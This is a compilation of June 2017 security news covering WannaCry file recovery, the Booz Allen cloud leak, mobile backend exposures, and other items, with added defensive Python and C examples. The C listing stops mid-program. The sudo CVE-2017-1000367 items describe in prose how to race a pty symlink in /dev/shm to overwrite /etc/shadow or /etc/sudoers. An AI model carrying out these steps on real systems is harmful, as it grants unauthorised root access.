If the file is stored outside of ‘important’ folders, then the original file will be moved to %TEMP%\%d.WNCRYT (where %d denotes a numeric value). These files contain the original data and are not overwritten; they are simply deleted from the disk, which means there is a high chance it will be possible to restore them using data recovery software.

Renamed original files that can be restored from %TEMP%

The files are located on other (non-system) drives:

The ransomware creates the “$RECYCLE” folder and sets the hidden and system attributes on it. This makes the folder invisible in Windows File Explorer under the default configuration. The malware intends to move the original files into this directory after encryption.

The procedure that determines the temporary directory to store original files before removal

However, because of synchronization errors in the ransomware code, in many cases the original files stay in the same directory and are not moved into $RECYCLE.
The original files are deleted in an insecure way (not overwritten before removal). This makes it possible to restore the deleted files using data recovery software.

Original files that can be restored from a non-system drive

The procedure that constructs the temporary path for an original file

The piece of code calling the above procedures

Read-only files processing error

While analysing WannaCry, we also discovered that this ransomware has a bug in its read-only file processing. If there are such files on the infected machine, then the ransomware won’t encrypt them at all. It will only create an encrypted copy of each original file, while the original files themselves only get the “hidden” attribute set. When this happens, it is simple to find them and restore their normal attributes.

Original read-only files are not encrypted and stay in the same place
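
The triage script below is an added example, not Kaspersky's code. It covers the two recoverable states described above that leave a file on disk: a renamed original of the form %TEMP%\<number>.WNCRYT, and a read-only original that the malware only marked hidden, sitting beside its .WNCRY copy (which the script can unhide on Windows). Originals the malware already deleted are no longer on the filesystem and need a file-recovery utility instead. The directory layout it builds is constructed sample data, and the directory and file names in it are assumptions.

```python
"""Triage of WannaCry leftovers that are still present on disk (added example)."""
import os
import re
import stat
import tempfile
from pathlib import Path

WNCRY = ".WNCRY"                                 # finished encrypted copy
TEMP_NAME = re.compile(r"^\d+\.WNCRYT$", re.I)   # %TEMP%\%d.WNCRYT renamed original


def find_recoverable(root):
    """Walk `root` and return {'temp_leftovers': [...], 'untouched_originals': [...]}.

    temp_leftovers      - files named <digits>.WNCRYT: renamed originals, not overwritten
    untouched_originals - a file still sitting beside '<same name>.WNCRY'; with the
                          read-only bug this is the unencrypted original, only hidden
    """
    root = Path(root)
    found = {"temp_leftovers": [], "untouched_originals": []}
    for dirpath, _dirs, files in os.walk(root):
        here = Path(dirpath)
        names = set(files)
        for name in files:
            if TEMP_NAME.match(name):
                found["temp_leftovers"].append(here / name)
            elif name.upper().endswith(WNCRY):
                original = name[: -len(WNCRY)]
                if original in names:
                    found["untouched_originals"].append(here / original)
    return found


def clear_hidden(path):
    """Remove the Windows 'hidden' attribute set on a read-only original.

    Returns True only if the attribute was present and has been cleared; False on
    non-Windows platforms, for missing files, and for files that are not hidden.
    """
    if os.name != "nt":
        return False
    import ctypes
    k32 = ctypes.windll.kernel32
    k32.GetFileAttributesW.restype = ctypes.c_uint32
    attrs = k32.GetFileAttributesW(str(path))
    hidden = stat.FILE_ATTRIBUTE_HIDDEN
    if attrs == 0xFFFFFFFF or not attrs & hidden:   # INVALID_FILE_ATTRIBUTES, or not hidden
        return False
    return bool(k32.SetFileAttributesW(str(path), attrs & ~hidden))


def build_sample_tree(base):
    """Create a constructed post-infection layout (sample data, not a real capture)."""
    base = Path(base)
    (base / "Temp").mkdir()
    (base / "Temp" / "12.WNCRYT").write_bytes(b"original bytes of a renamed document")
    docs = base / "Documents"
    docs.mkdir()
    # read-only original: still present, only hidden, with its encrypted copy beside it
    (docs / "budget.xlsx").write_bytes(b"original budget contents")
    (docs / "budget.xlsx.WNCRY").write_bytes(b"<constructed ciphertext>")
    # ordinary file in an 'important' folder: original overwritten and removed
    (docs / "notes.txt.WNCRY").write_bytes(b"<constructed ciphertext>")
    return base


def demo():
    """Build the sample tree in a fresh temp dir and return the findings as sorted
    POSIX-style paths relative to it, so the result does not depend on the OS."""
    base = build_sample_tree(tempfile.mkdtemp(prefix="wncry_demo_"))
    found = find_recoverable(base)
    return {k: sorted(p.relative_to(base).as_posix() for p in v) for k, v in found.items()}


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Run it against the root of each affected drive; anything listed under untouched_originals is an intact file that only needs its attributes restored, while the .WNCRYT leftovers and any missing originals are candidates for the file-recovery utilities mentioned in the conclusions.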

Conclusions

From our in-depth research into this ransomware, it is clear that the ransomware developers have made a lot of mistakes and, as we pointed out, the code quality is very low.

If you were infected with WannaCry ransomware there is a good possibility that you will be able to restore a lot of the files on the affected computer. To restore files, you can use the free utilities available for file recovery. We advise organizations to share this article with their system administrators, as they can use the file recovery utilities on affected machines in their network.


US Defense Contractor left Sensitive Files on Amazon Server Without Password
1.6.2017 thehackernews BigBrothers
Sensitive files linked to a United States intelligence agency were reportedly left on a public Amazon server by one of the nation's top intelligence contractors without a password, according to a new report.
UpGuard cyber risk analyst Chris Vickery discovered tens of thousands of documents from a US military project for the National Geospatial-Intelligence Agency (NGA) left unsecured on an Amazon cloud storage server for anyone to access.
The documents included passwords to a US government system containing sensitive information, and the security credentials of a senior employee of Booz Allen Hamilton, one of the country's top defense contractors.
Although there wasn't any top secret file in the cache Vickery discovered, the documents included credentials to log into code repositories that could contain classified files and other credentials.
Master Credentials to a Highly-Protected Pentagon System were Exposed
Roughly 28GB of exposed documents included the private Secure Shell (SSH) keys of a Booz Allen employee, and a half dozen plain text passwords belonging to government contractors with Top Secret Facility Clearance, Gizmodo reports.
What's more? The exposed data even contained master credentials granting administrative access to a highly-protected Pentagon system.
The sensitive files have since been secured and were likely hidden from those who didn't know where to look for them, but anyone, like Vickery, who knew where to look could have downloaded those sensitive files, potentially allowing access to both highly classified Pentagon material and Booz Allen information.
"In short, information that would ordinarily require a Top Secret-level security clearance from the DoD was accessible to anyone looking in the right place; no hacking was required to gain credentials needed for potentially accessing materials of a high classification level," Vickery says.
Vickery is a reputed and responsible researcher who has previously tracked down a number of exposed datasets on the Internet. Two months ago, he discovered an unsecured and publicly exposed database, containing nearly 1.4 Billion user records, linked to River City Media (RCM).
Vickery is the one who, in 2015, reported a huge cache of more than 191 Million US voter records and details of nearly 13 Million MacKeeper users.
Both NGA and Booz Allen are Investigating the Blunder
The NGA is now investigating this security blunder.
"We immediately revoked the affected credentials when we first learned of the potential vulnerability," the NGA said in a statement. "NGA assesses its cyber security protections and procedures constantly with all of its industry partners. For an incident such as this, we will closely evaluate the situation before determining an appropriate course of action."
However, Booz Allen said the company is continuing with a detailed forensic investigation about the misstep.
"Booz Allen takes any allegation of a data breach very seriously, and promptly began an investigation into the accessibility of certain security keys in a cloud environment," a Booz Allen spokesperson told Gizmodo.
"We secured those keys, and are continuing with a detailed forensic investigation. As of now, we have found no evidence that any classified information has been compromised as a result of this matter."
Booz Allen Hamilton is the same consulting firm that employed whistleblower Edward Snowden when he disclosed the global surveillance conducted by the NSA. It is among the top 100 US federal contractors and was once described as "the world’s most profitable spy organisation."


Enterprise Mobile Apps Expose Sensitive Data via Backend Systems

1.6.2017 securityweek Mobil
Many of the applications installed on enterprise mobile devices expose potentially sensitive data by failing to properly secure the connection between the app and backend servers, enterprise mobile security firm Appthority warned in a report published on Wednesday.

An analysis conducted by researchers has shown that the attack vector, dubbed by Appthority “HospitalGown” due to similarities with hospital gowns which typically expose the patient’s backside, affects more than 1,000 iOS and Android apps installed on enterprise devices.

The attack relies on vulnerabilities in the mobile application’s architecture and infrastructure, and it requires finding weaknesses in the communications between the app and server-side components.

Enterprise applications often connect to a backend database that stores user and other information. One of the tools used to analyze and mine the data stored on backend servers is the Elasticsearch engine. Given its popularity in large enterprises, Appthority decided to focus its investigation on apps that use Elasticsearch.

While the connection between the mobile app, its API and the Elasticsearch data store is typically secure, the Elasticsearch server is often exposed to the Internet. Appthority has identified more than 21,000 open Elasticsearch servers connecting to the 1,000 apps exposed to HospitalGown attacks. These servers exposed a total of 43 terabytes of data.

In addition to allowing access to data via unprotected Elasticsearch servers, the HospitalGown attack can leverage the way apps interact directly with the server. For example, researchers pointed out that an attacker could reverse engineer a mobile app to obtain the IP address of the Elasticsearch server, scan the Internet or the victim’s network for other vulnerable servers, and intercept traffic going to the server.

Appthority’s analysis focused on 39 popular iOS and Android applications found on enterprise mobile devices, such as ones used for agriculture, content management, dating, education, games, news, office productivity, travel, and mobile security and access management.

These apps were found to leak 163 gigabytes of data containing roughly 280 million records, including personally identifiable information (PII) and corporate data. Appthority believes the exposed data can be useful to launch further attacks, conduct fraud, or it can be sold to other malicious actors.

“Weakly secured backends leveraged by mobile app developers create opportunities for big data leaks and a significant increase in the risk of data misuse for spear phishing, brute force login, or other types of PII-based attacks for enterprises with employees, partners, or customers that use or have ever used these apps,” Appthority said in its report.

One of the analyzed apps was Pulse Workspace, which is used by enterprises, government agencies and service providers. While the application protected frontend Elasticsearch access using an API, the backend exposed Pulse Workspace customer data, including names, contact information, PIN reset tokens, and device information. The vendor patched the vulnerability after being notified by Appthority.

HospitalGown attack

According to experts, HospitalGown attacks can be highly problematic as they are not easy to detect and prevent without comprehensive security and visibility mechanisms in place, and addressing the underlying vulnerability can prove difficult, especially if the weakness is exclusively on the backend.


Google Rolls Out Business-Focused Security Enhancements for Gmail

1.6.2017 securityweek  Security
Google today announced a series of improvements to Gmail’s security aimed at making the service better at protecting business data.

As part of the newly rolled out update, Gmail will provide customers with early phishing detection capabilities and "click-time warnings" for malicious links that might have been included in messages coming from outside sources. External reply warnings were also rolled out to help prevent data loss, Andy Wen, Senior Product Manager, Counter Abuse Technology at Google, says.

Gmail’s updated phishing detection mechanism takes advantage of machine learning, and Wen claims the service can keep sneaky spam and phishing messages out of customers’ inboxes with over 99.9% accuracy. He also points out that 50%-70% of all messages received in Gmail are spam.

To improve their spam detection accuracy, Google launched early phishing detection, a dedicated machine learning model designed to selectively delay messages to perform rigorous phishing analysis. Only potentially suspicious messages will be flagged and delayed to perform additional checks on their content.

According to Wen, this should impact less than 0.05% of messages on average but should result in improved user data protection. In some cases, the additional checks could result in some messages arriving in the user’s inboxes with a delay of up to 4 minutes.

The feature, however, isn’t meant to replace anti-malware/phishing software, and admins can control it from the Admin console. The feature is on by default, Google says.

Paired with Google Safe Browsing machine learning, the detection models also aim at finding phishy and suspicious URLs and flagging them to the user.

These models leverage techniques such as reputation and similarity analysis on URLs, thus resulting in Gmail generating new URL click-time warnings for phishing and malware links. The feature was rolled out for Gmail on Android in the beginning of the month.

Aiming at preventing data loss, Gmail now displays unintended external reply warnings to users when they try to respond to someone outside the company domain. The service should know if the recipient is an existing contact or someone the user interacts with regularly, thus avoiding unnecessary warnings being displayed.

“This feature can give enterprises protection against forged email messages, impersonation, as well as common user-error when sending mail to the wrong contacts,” Google explains.

In addition to these enhancements, Google’s email service also received new built-in defenses against ransomware and polymorphic malware, meant to help it block millions of other messages that could potentially harm users.

The feature is meant to correlate spam signals with attachment and sender heuristics, and should result in successfully predicting messages containing new and unseen malware variants, Sri Somanchi, Product Manager, Gmail anti-spam, says.

“We classify new threats by combining thousands of spam, malware and ransomware signals with attachment heuristics (emails that could be threats based on signals) and sender signatures (already marked malware),” Wen notes.


Spear-Phishing Attacks Increasingly Focused: Report

1.6.2017 securityweek Phishing
Spear-phishing attacks have become increasingly “laser-focused,” with many campaigns aimed at only a small number of inboxes belonging to the targeted organization, according to a report published this week by Israel-based anti-email phishing solutions provider IRONSCALES.

The company analyzed data from 500,000 inboxes belonging to more than 100 of its customers over a period of 12 months. An evaluation of 8,500 emails that bypassed spam filters showed that roughly 77 percent of attacks targeted 10 inboxes or fewer, and one-third of malicious messages targeted only one inbox.

Experts believe attackers have been targeting fewer inboxes as this can help their operation stay under the radar longer, and it increases their chances of success if the emails are “hyper-personalized.”

The IRONSCALES study showed that 65 percent of email phishing attacks lasted for up to one month, and nearly half of them only lasted for less than 24 hours. Of the campaigns that went on for more than 30 days, roughly one-third spanned across 12 months or more.

Researchers noticed that attackers have increasingly aimed blast campaigns, which are not tailored to the recipient, at less than 10 mailboxes at a time. On the other hand, malware drip campaigns, which are more personalized, are more successful at bypassing traditional spam filters and they typically last longer.

According to the report, nearly 95 percent of phishing emails were part of highly targeted campaigns involving messages that impersonated someone from within the organization. Phishing emails that spoof a popular brand name are less common as they are more likely to be caught by spam filters - IRONSCALES noted that for every five brand-spoofing attacks detected by spam filters, 20 spear-phishing emails went undetected.

The most targeted departments are operations and finance, and the most frequently spoofed brands are DHL and Google.

“Sophisticated email phishing attacks represent the biggest threats to organizations of all sizes,” said Eyal Benishti, founder and CEO of IRONSCALES. “This report verifies that attackers have adopted numerous tools and techniques to circumvent traditional rules-based email security and spam filters. It’s now incumbent upon all organizational leaders to make sure that their employees are well-trained in phishing mitigation and that the cybersecurity technology in place is sophisticated enough to identify, verify and remediate email phishing attacks in real-time.”


US Says No Laptop Ban on Board Flights From Europe for Now

1.6.2017 securityweek Security
US aviation security officials stepped back Tuesday from imposing a ban on carry-on computers on flights coming from Europe, which had been proposed to guard against possible bomb-laden electronics from the Islamic State group.

But the Department of Homeland Security said a ban, already in place for US-bound flights from the Middle East, could still be implemented for Europe if the threat level worsens.

In a phone discussion with European Home Affairs Commissioner Dimitris Avramopoulos and Transport Commissioner Violeta Bulc Tuesday, DHS Secretary John Kelly "made it clear" a ban on passengers carrying tablet and computer-sized electronics on board flights to the United States "is still on the table," DHS said in a statement.

"Secretary Kelly affirmed he will implement any and all measures necessary to secure commercial aircraft flying to the United States -- including prohibiting large electronic devices from the passenger cabin -- if the intelligence and threat level warrant it."

A European Commission spokesperson confirmed the discussion, saying that no decision had been made on the laptop ban, but that the two sides "agreed to intensify talks" on tightening aviation security.

On March 21, Washington announced a ban on carry-on laptops and other electronics larger than a cellphone on direct flights to the United States from 10 airports in Turkey, the Middle East and North Africa.

The move came after intelligence officials learned of efforts by the Islamic State group to fashion a bomb into consumer electronics.

From any of those airports, US-bound passengers were forced to keep their electronics in checked baggage.

One day later Britain announced a similar ban for flights originating from six countries, and by early May DHS was threatening to impose a similar restriction for flights from Europe to the United States.

That would have a huge effect on the coming high travel season, with more than 3,250 flights a week scheduled to leave EU airports for the US this summer.

But after weeks of discussions, no decision was made. EU officials acknowledge that the decision is in the hands of US authorities.

DHS spokesman David Lapan said that European officials would be given ample warning ahead of any ban.


Developer of Advanced 'Bachosens' Malware Fails to Hide Identity

1.6.2017 securityweek Virus
Symantec has been tracking the activities of a “lone wolf” hacker who has apparently developed a sophisticated piece of malware that he has used to access the systems of at least two major organizations. However, researchers believe the cybercriminal made a relatively small profit and failed to protect his real identity.

The security firm first spotted the malware, which it tracks as “Bachosens,” in 2014, but there is evidence that its developer had launched attacks since as early as 2009. Symantec initially believed that the attacks involving Bachosens had been carried out by a nation-state threat actor given the malware’s sophistication, but further analysis revealed some rookie mistakes.

Bachosens, believed to have been delivered via spear-phishing emails, is a backdoor Trojan that gives its operator persistent access to the targeted system. In the attacks it analyzed, Symantec also spotted a keylogger, which researchers believe was manually pushed by the cybercriminal onto the infected device.

Unlike many other backdoors, which use HTTP or HTTPS to communicate with their command and control (C&C) servers, Bachosens uses DNS, ICMP and HTTP. The malware leverages a domain generation algorithm (DGA) to create C&C domains, but experts determined that the DGA is configured to only generate 13 domains per year.

Symantec has observed Bachosens infections on the systems of a Chinese autotech company and a large commercial airline. There is also evidence that the attacker targeted an online gambling firm, but his attempts failed.

While Bachosens is fairly advanced, the fact that the keylogger did not use any obfuscation, and the fact that one malware sample was packaged with an online game led experts to realize that these attacks were not the work of a sophisticated threat actor.

A closer analysis of strings found in the malware and domain registration data pointed researchers to a Russian-speaking individual who appears to reside in the town of Tiraspol in eastern Moldova. Tiraspol is the capital of the self-proclaimed state of Transnistria, where Russian is the dominant language.

The hacker, who researchers have identified only as Igor, is apparently connected to an auto parts store, which explains why he would target the Chinese autotech company. Researchers said the cybercriminal stole car diagnostics software that retails for $1,100 and sold it for only $110 on various forums and specifically created websites. On the other hand, it’s unclear why Igor would target a commercial airline.

Experts said the hacker posted personal information on public car forums, exposing his real identity.

“The level of information the attacker knowingly or negligently revealed about himself online gave us high confidence that he is an individual involved in the auto industry who is based in this part of Eastern Europe,” Symantec said in a blog post.

“His likely location in Tiraspol may also explain why he appears to have such modest aims when it comes to the gains he seems to be making from cyber crime. Although it is hard to get official data given it is a disputed territory, the average monthly salary in Transnistria has been reported as being as little as a few hundred euro. In that context, selling stolen software online for a few hundred euro could represent quite the windfall for an individual based in that part of the world,” the company added.

While researchers have apparently obtained a significant amount of information on the malware and its developer, some questions remain, including how Igor managed to create a sophisticated piece of malware while doing such a poor job at protecting his identity. One possibility is that he acquired the malware from someone, but Symantec believes this is unlikely given that no one else has used Bachosens.


Linux Flaw Allows Sudo Users to Gain Root Privileges

1.6.2017 securityweek Vulnerebility
A vulnerability affecting the manner in which Sudo parsed tty information could have resulted in the user gaining root privileges and being able to overwrite any file on the filesystem on SELinux-enabled systems.

Tracked as CVE-2017-1000367, the vulnerability was discovered by Qualys Security in Sudo's get_process_ttyname() for Linux. The issue resides in how Sudo parses tty information from the process status file in the proc filesystem.

The vulnerability could be exploited by a local user with privileges to execute commands via Sudo and could result in the user being able to escalate their privileges to root. Featuring a CVSS3 Base Score of 7.8, the issue is considered High severity.

In its advisory, Qualys Security explains that Sudo's get_process_ttyname() function opens "/proc/[pid]/stat" (man proc) and reads the device number of the tty from field 7 (tty_nr). Although these fields are space-separated, it is possible for field 2 (comm, the filename of the command) to contain spaces, so a naive split shifts every field that follows it, the security researchers explain.

Thus, Sudoer users on SELinux-enabled systems could escalate their privileges to overwrite any file on the filesystem with their command's output, including root-owned files.
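
To make the parsing point concrete, the following is an added example, not the sudo project's or Qualys' code. It contrasts the fragile whitespace split the advisory describes with a reading that anchors on the last ')' that closes the comm field, as proc(5) recommends. The sample stat line is constructed: a process whose command name contains a space, with a session id that lands in the seventh whitespace-separated slot, and a tty_nr of 34817 (major 136, minor 1, the first Unix98 pty slave block, i.e. /dev/pts/1).

```python
"""Reading tty_nr from /proc/[pid]/stat without being fooled by spaces in comm
(added example, not sudo's code)."""

TTY_NR_FIELD = 7   # 1-based field number of tty_nr in proc(5)

# Constructed sample line: pid 4242 running a command named "my tool" (note the
# space), session id 4242 and tty_nr 34817 (major 136, minor 1 = /dev/pts/1).
SAMPLE_STAT_LINE = (
    "4242 (my tool) S 1 4242 4242 34817 4242 4194560 120 0 0 0 3 1 0 0 20 0 1 0 "
    "1234567 8642560 412 18446744073709551615 1 1 0 0 0 0 0 0 0 0 0 0 17 0 0 0 0 0 0"
)


def naive_tty_nr(stat_line):
    """Plain whitespace split. Correct only while comm contains no spaces."""
    return int(stat_line.split()[TTY_NR_FIELD - 1])


def parse_stat(stat_line):
    """Return pid, comm, state and tty_nr, tolerating spaces and ')' inside comm.

    comm is the only field that can contain spaces and it is always wrapped in
    parentheses, so everything after the LAST ')' is a clean sequence of
    whitespace-separated fields starting at field 3 (state).
    """
    head, sep, tail = stat_line.rpartition(")")
    if not sep or "(" not in head:
        raise ValueError("not a /proc/[pid]/stat line")
    pid_str, _, comm = head.partition("(")
    fields = tail.split()            # field 3 onwards
    return {
        "pid": int(pid_str),
        "comm": comm,
        "state": fields[0],
        "tty_nr": int(fields[TTY_NR_FIELD - 3]),
    }


def robust_tty_nr(stat_line):
    """tty_nr read via parse_stat(), unaffected by spaces in comm."""
    return parse_stat(stat_line)["tty_nr"]


def decode_tty(tty_nr):
    """Split the kernel's dev_t encoding of tty_nr into (major, minor)."""
    major = (tty_nr >> 8) & 0xFFF
    minor = (tty_nr & 0xFF) | ((tty_nr >> 12) & 0xFFF00)
    return major, minor


def current_tty_nr():
    """tty_nr of this process read live from /proc/self/stat (Linux only).
    0 means no controlling terminal; None if /proc is not available."""
    try:
        with open("/proc/self/stat") as f:
            return robust_tty_nr(f.read())
    except OSError:
        return None


if __name__ == "__main__":
    print("naive :", naive_tty_nr(SAMPLE_STAT_LINE))    # session id, wrong field
    print("robust:", robust_tty_nr(SAMPLE_STAT_LINE))   # 34817
    print("major/minor:", decode_tty(robust_tty_nr(SAMPLE_STAT_LINE)))
    print("this process:", current_tty_nr())
```

The same lesson applies to any tool that reads /proc status files: a process name is attacker-influenced input, so field positions must be derived from the delimiting parentheses rather than from whitespace.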

To successfully exploit the issue, a Sudo user would have to choose a device number that doesn’t exist under "/dev". Because Sudo performs a breadth-first search of /dev if the terminal isn’t found under the /dev/pts directory, the user could allocate a pseudo-terminal between the two searches and create a “symbolic link to the newly-created device in a world-writable directory under /dev, such as /dev/shm,” an alert on Sudo reads.

The attacker then uses the file as the command's standard input, output and error when an SELinux role is specified on the sudo command line. If the symbolic link is replaced with another file before Sudo opens it, this allows the overwriting of arbitrary files by writing to the standard output or standard error.

“If SELinux is enabled on the system and Sudo was built with SELinux support, a user with sudo privileges may be able to overwrite an arbitrary file. This can be escalated to full root access by rewriting a trusted file such as /etc/shadow or even /etc/sudoers,” the alert on Sudo reveals.

The issue was found to affect all Sudo versions from 1.8.6p7 through 1.8.20 and was resolved in Sudo 1.8.20p1.


Ohio Companies Unite to Share Threat Intelligence

1.6.2017 securityweek Security
Cybersecurity is a form of asymmetric warfare. The attackers need to only succeed once; the defenders must succeed constantly. The attackers share weapons and methods continuously; the defenders are often isolated silos of private knowledge that comes only from the attacks against themselves. Threat intelligence sharing between the defenders is a primary method of reducing the attackers' inherent asymmetric advantage.

But intelligence sharing is difficult, comprising both human and technology problems. The human element is largely around 'trust' -- with whom can you share potentially sensitive commercial information. The technology problem involves constraining the shared data to intended recipients and ensuring there is no breach of data protection regulations.

These problems have been successfully tackled by seven Fortune 500 companies in Columbus, Ohio. They came together in 2014 to form and capitalize the Columbus Collaboratory -- an Information Sharing and Analysis Organization (ISAO). As a private and voluntary ISAO, they solved the 'human' problem. Last week they adopted the TruSTAR intelligence sharing platform to solve the technology problem.

The Collaboratory comprises seven major non-competitive firms in several separate sectors: Nationwide Insurance, Cardinal Health, LBrands (which includes Victoria's Secret and Bath & Body Works), Huntington Bank, OhioHealth, American Electric Power, and Battelle. It was formed with a $28 million commitment from the members, and a $5 million Ohio Third Frontier Grant.

The non-competitive nature is important. "Columbus lends itself to such an approach," Jeff Schmidt, VP and chief cyber security innovator, told SecurityWeek. "It's an important commercial center, but is not dominated by any one vertical." This allows the members to come together with no fear of disclosing sensitive data to competitors. While Schmidt sees the group potentially growing with new members, he doesn't believe the non-competitive element will ever change.

One of the first things Schmidt did when he joined the organization in October 2016 was to bring the liaison officers from the different companies together. "Nothing encourages trust more than face-to-face meetings," he said -- drawing perhaps from his earlier experience as Director at the InfraGard National Members Alliance.

The Collaboratory offers its members three primary services: cybersecurity, advanced analytics and talent solutions. "By sharing threat intelligence," he said, "we can break out of the silo model, pool ideas and resources, and better protect against cybersecurity threats." But, he added, "One of the nice features is that being completely private, there is no mandatory reporting from the Collaboratory to any outside agency, such as the FBI. In that way, it is different than other government-sponsored information sharing platforms."

These other platforms include ISACs (created by the DHS) and InfraGard (created by the FBI). "We've seen what works and what doesn't work," he said. "A lot of the inhibitors to effective information sharing are legal and philosophical -- if I share this information is the FBI or the NSA going to get it. Removing that variable is a net help." The individual members, many designated as part of the national critical infrastructure, may have their own vertical reporting responsibilities -- but the Collaboratory itself has none.

The final piece of the puzzle came into place last week with the adoption of the TruSTAR information exchange platform. "There is a common desire in business to share intelligence," commented Paul Kurtz, former cybersecurity advisor to the White House and now co-founder and CEO of TruSTAR, "but those legal and philosophical inhibitors have made it difficult."

The TruSTAR platform provides a walled enclave where data can be shared with just the Collaboratory members. Data can be redacted before sharing -- indeed, TruSTAR will automatically detect any likely PII with a point, click and redact facility to prevent its sharing -- and anonymized to prevent attribution. Only data specifically allowed for wider sharing can leave the enclave to be shared among the wider TruSTAR community. In this way, it maximizes sharing both between the members and with the wider community, while protecting any data that should not be shared. This is further enhanced with TruSTAR's selective version capability.

"If members wish to share a redacted document within the Collaboratory, and a more redacted version with the wider TruSTAR community," added Schmidt, "then TruSTAR can accommodate selective version sharing."

For the most part, the shared information will be indicators of compromise, behaviors, patterns and attackers' infrastructure, not PII. If any PII slips in, it can be redacted. In this way, Schmidt believes that the members can stay on the right side of data protection regulations, including GDPR when it arrives next year. If anything, the structure imposed upon shared data is likely to make breach notification simpler and more efficient, making it easier for members to comply with GDPR's 72-hour notification requirement.

It's early days for the Columbus Collaboratory; but does the theory work in practice? "Yes," said Kurtz. "One example was a firm that thought it had a staff problem only to find that other companies were having the same problem. It wasn't staff, it was subtle indications of an intruder that only became apparent through intelligence sharing."

The Columbus Collaboratory, aided in this instance by the TruSTAR sharing platform, is unique. But it is an example to other regions where different companies can come together and share their threat intelligence, safely, securely, compliant with data protection regulations, and with no three-letter agency inhibitions.


A recently discovered Linux flaw could be exploited by Sudo Users to gain Root Privileges
1.6.2017 securityaffairs Vulnerability

Security researchers at Qualys Security have discovered a Linux flaw that could be exploited to escalate privileges and overwrite any file on the filesystem.
Security researchers at Qualys Security have discovered a Linux flaw that could be exploited to gain root privileges and overwrite any file on the filesystem of SELinux-enabled systems.

The high severity flaw, tracked as CVE-2017-1000367, resides in Sudo's get_process_ttyname() function for Linux and is related to the way Sudo parses tty information from the process status file in the proc filesystem.

The Linux flaw could be exploited by a local user with privileges to execute commands via Sudo and could allow attackers to escalate their privileges to root.

Sudo's get_process_ttyname() function opens "/proc/[pid]/stat" (man proc) and reads the device number of the tty from field 7 (tty_nr). These fields are space-separated, but field 2 (comm, the filename of the command) can itself contain spaces, so counting fields by spaces can land on the wrong value.

Sudoer users on SELinux-enabled systems could escalate their privileges to overwrite any file on the filesystem with their command’s output, including root-owned files.

“We discovered a vulnerability in Sudo’s get_process_ttyname() for Linux: this function opens “/proc/[pid]/stat” (man proc) and reads the device number of the tty from field 7 (tty_nr). Unfortunately, these fields are space-separated and field 2 (comm, the filename of the command) can contain spaces (CVE-2017-1000367).” reads the security advisory. “On an SELinux-enabled system, if a user is Sudoer for a command that does not grant him full root privileges, he can overwrite any file on the filesystem (including root-owned files) with his command’s output, because relabel_tty() (in src/selinux.c) calls open(O_RDWR|O_NONBLOCK) on his tty and dup2()s it to the command’s stdin, stdout, and stderr. This allows any Sudoer user to obtain full root privileges.”

To exploit the issue, a Sudo user would have to choose a device number that doesn’t exist under “/dev”. If the terminal isn’t present under the /dev/pts directory when Sudo performs a breadth-first search of /dev, the user could allocate a pseudo-terminal between the two searches and create a “symbolic link to the newly-created device in a world-writable directory under /dev, such as /dev/shm.”

“Exploiting the bug requires that the user already have sudo privileges. SELinux must also be enabled on the system and sudo must have been built with SELinux support.
To exploit the bug, the user can choose a device number that does not currently exist under /dev. If sudo does not find the terminal under the /dev/pts directory, it performs a breadth-first search of /dev. It is possible to allocate a pseudo-terminal after sudo has checked /dev/pts but before sudo performs its breadth-first search of /dev. The attacker may then create a symbolic link to the newly-created device in a world-writable directory under /dev, such as /dev/shm.” read a Sudo alert.


“This file will be used as the command’s standard input, output and error when an SELinux role is specified on the sudo command line. If the symbolic link under /dev/shm is replaced with a link to an another file before it is opened by sudo, it is possible to overwrite an arbitrary file by writing to the standard output or standard error. This can be escalated to full root access by rewriting a trusted file such as /etc/shadow or even /etc/sudoers.”

The Linux flaw affects all Sudo versions from 1.8.6p7 through 1.8.20; Sudo 1.8.20p1 fixes it. The issue was rated with a CVSS3 Base Score of 7.8.
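The field-counting problem in get_process_ttyname() described above, shown as an added example that is not part of the article or of Sudo's own code: a naive space-split reading of field 7 beside a parser that anchors on the last ')' closing the comm field, which is the only field of /proc/[pid]/stat that may contain spaces or parentheses. Both stat lines are constructed for the example, not captured from a real system.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 1-based field numbers in /proc/[pid]/stat, as documented in proc(5). */
#define COMM_FIELD   2   /* (comm): executable name in parentheses, may contain spaces */
#define TTY_NR_FIELD 7   /* tty_nr: controlling terminal encoded as a Linux dev_t */

/* Constructed sample lines (not from a real system). Field 7 is 34816 = 0x8800
 * in both, i.e. major 136, minor 0: /dev/pts/0. */
const char *const STAT_PLAIN  = "1234 (bash) S 1000 1234 1234 34816 1234 4194304 0 0 0 0";
/* Same process data, but comm contains two spaces, as the advisory warns. */
const char *const STAT_SPACES = "1234 (a b c) S 1000 1234 1234 34816 1234 4194304 0 0 0 0";

/* Skip the current token and the spaces after it; NULL if the line ends first. */
static const char *next_field(const char *p)
{
    while (*p != ' ' && *p != '\0')
        p++;
    if (*p == '\0')
        return NULL;
    while (*p == ' ')
        p++;
    return p;
}

/* Parse the decimal number at p; -1 if no digits are present. */
static long parse_long(const char *p)
{
    char *end = NULL;
    long v = strtol(p, &end, 10);
    return end == p ? -1 : v;
}

/* Naive parser: treat the whole line as space-separated and take field 7.
 * This is the assumption the advisory calls unsafe: every space inside comm
 * shifts the count, so "field 7" is no longer tty_nr. */
long naive_tty_nr(const char *stat_line)
{
    const char *p = stat_line;
    for (int field = 1; field < TTY_NR_FIELD && p != NULL; field++)
        p = next_field(p);
    return p == NULL ? -1 : parse_long(p);
}

/* Robust parser: comm is the only field that may contain spaces or parentheses,
 * so the tail after the LAST ')' is cleanly space-separated and starts with
 * field 3 (state). Count from there instead of from the start of the line. */
long robust_tty_nr(const char *stat_line)
{
    const char *close = strrchr(stat_line, ')');
    if (close == NULL || close[1] != ' ')
        return -1;
    const char *p = close + 1;
    while (*p == ' ')
        p++;
    for (int field = COMM_FIELD + 1; field < TTY_NR_FIELD && p != NULL; field++)
        p = next_field(p);
    return p == NULL ? -1 : parse_long(p);
}

/* Split a dev_t as encoded in tty_nr into major/minor numbers, using the
 * layout of the kernel's MAJOR()/MINOR() macros. */
int tty_major(long dev) { return (int)((dev >> 8) & 0xfff); }
int tty_minor(long dev) { return (int)((dev & 0xff) | ((dev >> 12) & 0xfff00)); }

/* Defensive check: if the two readings disagree, the line is not in the shape
 * the naive code assumed and its tty value must not be trusted. */
int parsers_agree(const char *stat_line)
{
    long a = naive_tty_nr(stat_line), b = robust_tty_nr(stat_line);
    return a != -1 && a == b;
}

int main(void)
{
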